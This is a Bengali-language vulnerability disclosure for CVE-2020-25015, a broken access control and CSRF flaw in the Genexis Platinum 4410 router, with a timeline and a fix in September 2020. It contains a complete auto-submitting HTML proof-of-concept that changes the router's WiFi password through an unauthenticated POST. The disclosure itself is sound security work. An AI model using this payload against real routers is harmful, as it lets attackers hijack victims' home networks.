কম্পিউটার

জেনেক্সিস প্লাটিনাম 4410 রাউটার V2.1 এ ব্রোকেন অ্যাক্সেস কন্ট্রোল এবং CSRF

জেনেক্সিস প্লাটিনাম 4410 হোম রাউটার সংস্করণ 2.1 (সফ্টওয়্যার সংস্করণ P4410-V2-1.28) পরীক্ষা করার সময়, আমি খুঁজে পেয়েছি যে রাউটারটি ব্রোকেন অ্যাক্সেস কন্ট্রোল এবং CSRF এর জন্য ঝুঁকিপূর্ণ৷

CVE আইডি: CVE-2020-25015

সারাংশ

প্লাটিনাম 4410 জেনেক্সিসের একটি কমপ্যাক্ট রাউটার যা সাধারণত বাড়িতে ব্যবহৃত হয়। হার্ডওয়্যার সংস্করণ V2.1 - সফ্টওয়্যার সংস্করণ P4410-V2-1.28 ব্রোকেন অ্যাক্সেস কন্ট্রোল এবং CSRF এর জন্য ঝুঁকিপূর্ণ বলে প্রমাণিত হয়েছে যা দূরবর্তীভাবে WIFI অ্যাক্সেস পয়েন্টের পাসওয়ার্ড পরিবর্তন করতে একত্রিত হতে পারে।

CSRF সম্পর্কে আরও তথ্যের জন্য, অনুগ্রহ করে এই নিবন্ধটি দেখুন।

প্রভাব

একজন আক্রমণকারী শিকারকে একটি লিঙ্ক পাঠাতে পারে, যদি সে দুর্বল রাউটার থেকে প্রতিষ্ঠিত WIFI নেটওয়ার্কের সাথে সংযুক্ত থাকাকালীন ক্লিক করে, তাহলে WIFI অ্যাক্সেস পয়েন্টের পাসওয়ার্ড CSRF শোষণের মাধ্যমে পরিবর্তিত হবে। যেহেতু রাউটারটি ব্রোকেন অ্যাক্সেস কন্ট্রোলের জন্যও ঝুঁকিপূর্ণ, তাই ভিকটিমকে রাউটারের ওয়েব-ভিত্তিক সেটআপ পৃষ্ঠায় (192.168.1.1) লগ ইন করার প্রয়োজন নেই, যা মূলত এটিকে এক-ক্লিক হ্যাক করে তোলে৷

দুর্বলতা

আদর্শভাবে, এই আক্রমণটি ঝামেলাপূর্ণ হবে কারণ একটি CSRF আক্রমণ সফল হওয়ার জন্য, শিকারকে আক্রমণের অধীনে থাকা অ্যাপ্লিকেশনটিতে লগ ইন করতে হবে (এই ক্ষেত্রে, ওয়েব-ভিত্তিক সেটআপ পৃষ্ঠা 192.168.1.1) এবং বেশিরভাগ রাউটার সেটআপ পেজ স্বয়ংক্রিয়ভাবে ব্যবহারকারীর সেশন শেষ করে। উপরন্তু, এটি খুব কমই হয় যে গ্রাহকরা তাদের রাউটারের সেটআপ পৃষ্ঠাটিও দেখেন। যাইহোক, রিপোর্ট করার সময় ফার্মওয়্যারের সর্বশেষ সংস্করণে ভাঙা অ্যাক্সেস নিয়ন্ত্রণের দুর্বলতার কারণে, পাসওয়ার্ড পরিবর্তন করার অনুরোধটি অপ্রমাণিত পক্ষগুলিও পাঠাতে পারে৷

এইভাবে ফার্মওয়্যারের এই সংস্করণে CSRF এবং ব্রোকেন অ্যাক্সেস কন্ট্রোল দুর্বলতাগুলিকে একত্রিত করে, একজন আক্রমণকারী নিম্নলিখিত কোড সহ একটি HTML নথি তৈরি করতে পারে এবং ব্যবহারকারীকে এটি জমা দেওয়ার জন্য টোপ দিতে পারে৷

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
 <form action="https://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
 <input type="hidden" name="wlEnbl" value="ON" />
 <input type="hidden" name="hwlKeys0" value="" />
 <input type="hidden" name="hwlKeys1" value="" />
 <input type="hidden" name="hwlKeys2" value="" />
 <input type="hidden" name="hwlKeys3" value="" />
 <input type="hidden" name="hwlgMode" value="9" />
 <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
 <input type="hidden" name="hwlEnbl" value="1" />
 <input type="hidden" name="hWPSMode" value="1" />
 <input type="hidden" name="henableSsid" value="1" />
 <input type="hidden" name="hwlHide" value="0" />
 <input type="hidden" name="isInWPSing" value="0" />
 <input type="hidden" name="WpsConfModeAll" value="7" />
 <input type="hidden" name="WpsConfModeNone" value="0" />
 <input type="hidden" name="hWpsStart" value="0" />
 <input type="hidden" name="isCUCSupport" value="0" />
 <input type="hidden" name="SSIDPre" value="N&#47;A" />
 <input type="hidden" name="bwControlhidden" value="0" />
 <input type="hidden" name="ht&#95;bw" value="1" />
 <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
 <input type="hidden" name="wlChannel" value="0" />
 <input type="hidden" name="wlTxPwr" value="1" />
 <input type="hidden" name="wlSsidIdx" value="0" />
 <input type="hidden" name="SSID&#95;Flag" value="0" />
 <input type="hidden" name="wlSsid" value="JINSON" />
 <input type="hidden" name="wlMcs" value="33" />
 <input type="hidden" name="bwControl" value="1" />
 <input type="hidden" name="giControl" value="1" />
 <input type="hidden" name="enableSsid" value="on" />
 <input type="hidden" name="wlAssociateNum" value="32" />
 <input type="hidden" name="wlSecurMode" value="WPAand11i" />
 <input type="hidden" name="wlPreauth" value="off" />
 <input type="hidden" name="wlNetReauth" value="1" />
 <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
 <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
 <input type="hidden" name="wlWpaGtkRekey" value="" />
 <input type="hidden" name="wlRadiusIPAddr" value="" />
 <input type="hidden" name="wlRadiusPort" value="" />
 <input type="hidden" name="wlRadiusKey" value="" />
 <input type="hidden" name="wlWpa" value="TKIPAES" />
 <input type="hidden" name="wlKeyBit" value="64" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="WpsActive" value="0" />
 <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
 <input type="hidden" name="pinvalue" value="" />
 <input type="hidden" name="Save&#95;Flag" value="1" />
 <input type="submit" value="Submit request" />
 </form>
 <script>
 document.forms[0].submit();
 </script>
 </body>
</html>

যতক্ষণ ভিকটিম ক্ষতিগ্রস্ত রাউটার দ্বারা প্রতিষ্ঠিত WiFi অ্যাক্সেস পয়েন্টের সাথে সংযুক্ত থাকে, ততক্ষণ নীচের ভিডিওতে দেখানো হিসাবে অ্যাক্সেস পয়েন্টের পাসওয়ার্ড পরিবর্তন করা হবে৷

টাইমলাইন

  • গত ২৮শে আগস্ট, ২০২০ তারিখে জেনেক্সিস টিমের কাছে দুর্বলতা রিপোর্ট করা হয়েছে
  • টিম নিশ্চিত করেছে যে ফার্মওয়্যার রিলিজ 14 সেপ্টেম্বর, 2020-এ ফিক্স রয়েছে

প্রস্তাবিত

  • জেনেক্সিস টিমের মতে, সর্বশেষ ফার্মওয়্যারে অ্যাক্সেস পেতে গ্রাহকদের তাদের ISP-এর সাথে যোগাযোগ করা উচিত।
  • আপনি যদি ফার্মওয়্যার আপগ্রেড করতে না পারেন তাহলে আরও নিরাপদ রাউটার ব্যবহার করুন।

রেফারেন্স

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
  • https://nvd.nist.gov/vuln/detail/CVE-2020-25015


  1. ঠিক করুন:এই ডিভাইসটি রাউটারে অ্যাক্সেস কন্ট্রোল দ্বারা ব্লক করা হয়েছে

  2. ACLSync এর সাথে স্বয়ংক্রিয় অ্যাক্সেস নিয়ন্ত্রণ

  3. বেলকিন রাউটারে কোনও WI-FI অ্যাক্সেস নেই

  4. বেলকিন রাউটারে কোনও WI-FI অ্যাক্সেস নেই